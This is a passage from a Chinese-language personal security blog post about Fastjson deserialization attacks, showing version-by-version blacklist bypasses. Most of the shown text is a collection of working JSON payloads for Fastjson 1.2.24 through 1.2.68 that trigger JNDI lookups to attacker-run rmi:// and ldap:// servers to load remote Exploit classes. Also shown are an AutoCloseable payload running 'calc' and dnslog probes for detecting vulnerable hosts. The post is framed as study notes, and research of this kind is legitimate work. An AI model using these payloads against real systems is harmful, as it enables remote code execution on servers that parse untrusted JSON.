<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.xbean.propertyeditor.JndiConverter&quot;</span>,<span class="string">&quot;AsText&quot;</span>:<span class="string">&quot;rmi://127.0.0.1:1098/exploit&quot;</span>&#125;</span><br><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.cocoon.components.slide.impl.JMSContentInterceptor&quot;</span>,<span class="string">&quot;parameters&quot;</span>:&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.util.Hashtable&quot;</span>,<span class="string">&quot;java.naming.factory.initial&quot;</span>:<span class="string">&quot;com.sun.jndi.rmi.registry.RegistryContextFactory&quot;</span>,<span class="string">&quot;topic-factory&quot;</span>:<span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span>&#125;,<span class="string">&quot;namespace&quot;</span>:<span class="string">&quot;&quot;</span>&#125;</span><br></pre></td></tr></table></figure>

<h2 id="1-2-24-1-2-66"><a href="#1-2-24-1-2-66" class="headerlink" title="1.2.24-1.2.66"></a>1.2.24-1.2.66</h2><p>需要开启autotype<br>payload:</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.shiro.jndi.JndiObjectFactory&quot;</span>,<span class="string">&quot;resourceName&quot;</span>:<span class="string">&quot;ldap://192.168.80.1:1389/Calc&quot;</span>&#125;</span><br><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.shiro.realm.jndi.JndiRealmFactory&quot;</span>,<span class="string">&quot;jndiNames&quot;</span>:[<span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span>], <span class="string">&quot;Realms&quot;</span>:[<span class="string">&quot;&quot;</span>]&#125;</span><br><span class="line">&gt; ​&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;br.com.anteros.dbcp.AnterosDBCPConfig&quot;</span>,<span class="string">&quot;metricRegistry&quot;</span>:<span class="string">&quot;ldap://192.168.80.1:1389/Calc&quot;</span>&#125;​</span><br><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;br.com.anteros.dbcp.AnterosDBCPConfig&quot;</span>,<span class="string">&quot;healthCheckRegistry&quot;</span>:<span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span>&#125;​</span><br><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup&quot;</span>,<span class="string">&quot;jndiNames&quot;</span>:<span class="string">&quot;ldap://192.168.80.1:1389/Calc&quot;</span>&#125;​</span><br><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig&quot;</span>,<span class="string">&quot;properties&quot;</span>:&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.util.Properties&quot;</span>,<span class="string">&quot;UserTransaction&quot;</span>:<span class="string">&quot;ldap://192.168.80.1:1399/Calc&quot;</span>&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="1-2-24-1-2-67"><a href="#1-2-24-1-2-67" class="headerlink" title="1.2.24-1.2.67"></a>1.2.24-1.2.67</h2><p>需要开启autotype<br>payload:</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup&quot;</span>,<span class="string">&quot;jndiNames&quot;</span>:[<span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span>], <span class="string">&quot;tm&quot;</span>: &#123;<span class="string">&quot;$ref&quot;</span>:<span class="string">&quot;$.tm&quot;</span>&#125;&#125;</span><br><span class="line">&gt; ​&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.shiro.jndi.JndiObjectFactory&quot;</span>,<span class="string">&quot;resourceName&quot;</span>:<span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span>,<span class="string">&quot;instance&quot;</span>:&#123;<span class="string">&quot;$ref&quot;</span>:<span class="string">&quot;$.instance&quot;</span>&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="1-2-24-1-2-68"><a href="#1-2-24-1-2-68" class="headerlink" title="1.2.24-1.2.68"></a>1.2.24-1.2.68</h2><p>无需开启AutoType</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.lang.AutoCloseable&quot;</span>,<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;vul.VulAutoCloseable&quot;</span>,<span class="string">&quot;cmd&quot;</span>:<span class="string">&quot;calc&quot;</span>&#125;</span><br></pre></td></tr></table></figure>

<h2 id="检测payload"><a href="#检测payload" class="headerlink" title="检测payload"></a>检测payload</h2><figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.net.InetAddress&quot;</span>,<span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog.cn&quot;</span>&#125; </span><br><span class="line">&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.net.Inet4Address&quot;</span>,<span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog&quot;</span>&#125;</span><br><span class="line">&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.net.Inet6Address&quot;</span>,<span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog&quot;</span>&#125;</span><br><span class="line">&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.net.InetSocketAddress&quot;</span>&#123;<span class="string">&quot;address&quot;</span>:,<span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog&quot;</span>&#125;&#125;</span><br><span class="line">&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;com.alibaba.fastjson.JSONObject&quot;</span>, &#123;<span class="string">&quot;@type&quot;</span>: <span class="string">&quot;java.net.URL&quot;</span>, <span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog&quot;</span>&#125;&#125;<span class="string">&quot;&quot;</span>&#125;</span><br><span class="line">&#123;&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.net.URL&quot;</span>,<span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog&quot;</span>&#125;:<span class="string">&quot;aaa&quot;</span>&#125;</span><br><span class="line">Set[&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.net.URL&quot;</span>,<span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog&quot;</span>&#125;]</span><br><span class="line">Set[&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.net.URL&quot;</span>,<span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog&quot;</span>&#125;</span><br><span class="line">&#123;&#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.net.URL&quot;</span>,<span class="string">&quot;val&quot;</span>:<span class="string">&quot;dnslog&quot;</span>&#125;:<span class="number">0</span></span><br></pre></td></tr></table></figure>

<h1 id="0x03、总结"><a href="#0x03、总结" class="headerlink" title="0x03、总结"></a>0x03、总结</h1><p>在48版本开始疯狂的bypass黑名单，大体跟完fastjson的修复感觉就是掉一个捡一个，还是学到很多，其中还有些涉及到不出网的利用还没分析学习，后面再跟</p>
<h1 id="0x04、参考链接"><a href="#0x04、参考链接" class="headerlink" title="0x04、参考链接"></a>0x04、参考链接</h1><p><a target="_blank" rel="noopener" href="https://drun1baby.github.io/2022/08/08/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96Fastjson%E7%AF%8703-Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/">https://drun1baby.github.io/2022/08/08/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96Fastjson%E7%AF%8703-Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/</a><br><a target="_blank" rel="noopener" href="https://www.yuque.com/tianxiadamutou/zcfd4v/xehnw7">https://www.yuque.com/tianxiadamutou/zcfd4v/xehnw7</a><br><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1957185">https://cloud.tencent.com/developer/article/1957185</a><br><a target="_blank" rel="noopener" href="https://xie.infoq.cn/article/2e75402d042279ad0845faba9">https://xie.infoq.cn/article/2e75402d042279ad0845faba9</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/ad3be040.html" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2023-02-15 10:00:00
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/Java%E5%AE%89%E5%85%A8/" title="Java安全">
                        #Java安全
                      </a>
                    </span>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/Java%E5%88%A9%E7%94%A8%E9%93%BE/" title="Java利用链">
                        #Java利用链
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/posts/10575800.html" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00%E3%80%81%E5%89%8D%E8%A8%80"><span class="toc-text">0x00、前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01%E3%80%81JdbcRowSetImpl%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90"><span class="toc-text">0x01、JdbcRowSetImpl利用链分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E7%9F%A5%E8%AF%86%E5%89%8D%E6%8F%90"><span class="toc-text">一、知识前提</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81JdbcRowSetImpl%E6%9C%AC%E8%BA%AB"><span class="toc-text">二、JdbcRowSetImpl本身</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81Fastjson-JdbcRowSetImpl"><span class="toc-text">三、Fastjson-JdbcRowSetImpl</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02%E3%80%81fastjson%E9%AB%98%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90"><span class="toc-text">0x02、fastjson高版本绕过分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-25-1-2-41"><span class="toc-text">1.2.25-1.2.41</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-25-1-2-42"><span class="toc-text">1.2.25-1.2.42</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-25-1-2-43"><span class="toc-text">1.2.25-1.2.43</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-25-1-2-44"><span class="toc-text">1.2.25-1.2.44</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-25-1-2-45"><span class="toc-text">1.2.25-1.2.45</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-25-1-2-47%E9%80%9A%E6%9D%80%E7%BB%95%E8%BF%87"><span class="toc-text">1.2.25-1.2.47通杀绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-50-1-2-59"><span class="toc-text">1.2.50-1.2.59</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-50-1-2-60"><span class="toc-text">1.2.50-1.2.60</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-50-1-2-61"><span class="toc-text">1.2.50-1.2.61</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-24-1-2-62"><span class="toc-text">1.2.24-1.2.62</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-24-1-2-66"><span class="toc-text">1.2.24-1.2.66</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-24-1-2-67"><span class="toc-text">1.2.24-1.2.67</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-24-1-2-68"><span class="toc-text">1.2.24-1.2.68</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A3%80%E6%B5%8Bpayload"><span class="toc-text">检测payload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03%E3%80%81%E6%80%BB%E7%BB%93"><span class="toc-text">0x03、总结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04%E3%80%81%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-text">0x04、参考链接</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        




  
    <script async type="text/javascript" src="/plugins/valine.min.js" onload="loadValineSuc(this)"></script>
  

  <div id="vcomments"></div>

  <script>
    function loadValineSuc() {
      new Valine({
        el: '#vcomments',
        appId: '5WzQHrZA6gNtoCZa9qWZkFjv-gzGzoHsz',
        appKey: 'O1mOg3eUPYzPIUYEaX54ip6s',
        placeholder: 'here',
        avatar: 'monsterid',
        lang: 'zh-CN'
      })
    }
  </script>

    <style>
      .comments-container .v .vempty {
        display: none!important;
      }
    </style>




      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Okaytc">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="https://okaytc.github.io/">Copyright © Okaytc 2022</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a href="https://okaytc.github.io/">一个热爱健身的脚本小子</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + java%E5%AE%89%E5%85%A8-Fastjson-JdbcRowSetImpl%E5%88%A9%E7%94%A8%E9%93%BE%E5%8F%8A%E9%AB%98%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90 + '&url=' + https%3A%2F%2Fokaytc.github.io%2Fposts%2Fad3be000.html + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://okaytc.github.io/posts/ad3be000.html" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
